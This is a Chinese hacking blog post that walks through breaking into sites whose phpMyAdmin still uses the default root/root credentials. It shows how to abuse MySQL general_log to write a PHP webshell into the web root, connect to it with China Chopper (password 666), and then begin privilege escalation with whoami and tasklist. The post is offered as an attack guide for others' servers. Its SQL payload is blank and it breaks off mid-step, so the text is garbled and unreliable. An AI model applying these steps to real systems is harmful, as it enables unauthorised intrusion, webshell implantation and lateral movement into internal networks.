黑客入侵数据库指令

猫屋博客

phpMyAdmin弱口令,从数据库杀到内网一条龙

超超超超超详细


ps:不混娱乐圈,mors是我大哥,不服喷他


什么是phpMyAdmin?


phpMyAdmin 是一个以PHP为基础,以Web-Base方式架构在网站主机上的MySQL的数据库管理工具,让管理者可用Web接口管理MySQL数据库。借由此Web接口可以成为一个简易方式输入繁杂SQL语法的较佳途径,尤其要处理大量资料的汇入及汇出更为方便。其中一个更大的优势在于由于phpMyAdmin跟其他PHP程式一样在网页服务器上执行,但是您可以在任何地方使用这些程式产生的HTML页面,也就是于远端管理MySQL数据库,方便的建立、修改、删除数据库及资料表。也可借由phpMyAdmin建立常用的php语法,方便编写网页时所需要的sql语法正确性。


以上这些都不重要,重要的是能干什么?[滑稽]


phpMyAdmin在配置的时候,如果不去修改,默认账号密码就是root/root

什么?你问我他为什么不去修改?

不是每个人都懂这些的好吧?

看看有多少傻瓜式搭建网站的帖子就知道了

当初在帮别人改代码的时候

惊奇的发现源码里面有木马!

更可笑的是,还跟我说是特意这样写的!

着实把我逗笑了

偏偏小白们还看不出来


好了好了,言归正传


弱口令进了数据库我们能干嘛呢?

当然是拿shell


先找网站的根目录

一个是是否开启,一个是写入路径

general_log          一般是off,改成on

general_log_file   C:\phpStudy\WWW\log.php

改成你喜欢的名字,比如:

general_log_file   C:\phpStudy\WWW\123.php


执行一句话:

select ;

这样木马就被写入了123.php里面

密码是666,菜刀连接

原理就是,你执行的sql语句会被日志记录下来


拿到shell之后呢?当然是提权啦!

用shell打开虚拟终端

1.whoami看看啥权限

(有的是system权限,还有的可能是Administrator,还有比较鸡贼的,看似是Administrator,实际权限低的可怜)


2.tasklist  /svc 找远程服务(Windows远程服务名称为:TermService)记录PID


3.net黑客入侵数据库指令,D9FF4533-A3BF-47DC-AF1C-6819598E202B.jpeg,phpMyAdmin,shell,ssh,爆破,网,网站,代码,第1张


文章版权声明:除非注明,否则均为猫屋博客MAOWUO.CN原创文章,转载或复制请以超链接形式并注明出处。

您需要 登录账户 后才能发表评论

发表评论取消回复

快捷回复: 表情:
AddoilApplauseBadlaughBombCoffeeFabulousFacepalmFecesFrownHeyhaInsidiousKeepFightingNoProbPigHeadShockedSinistersmileSlapSocialSweatTolaughWatermelonWittyWowYeahYellowdog
评论列表 (暂无评论,180人围观)

还没有评论,来说两句吧...

目录[+]

取消
微信二维码
微信二维码
支付宝二维码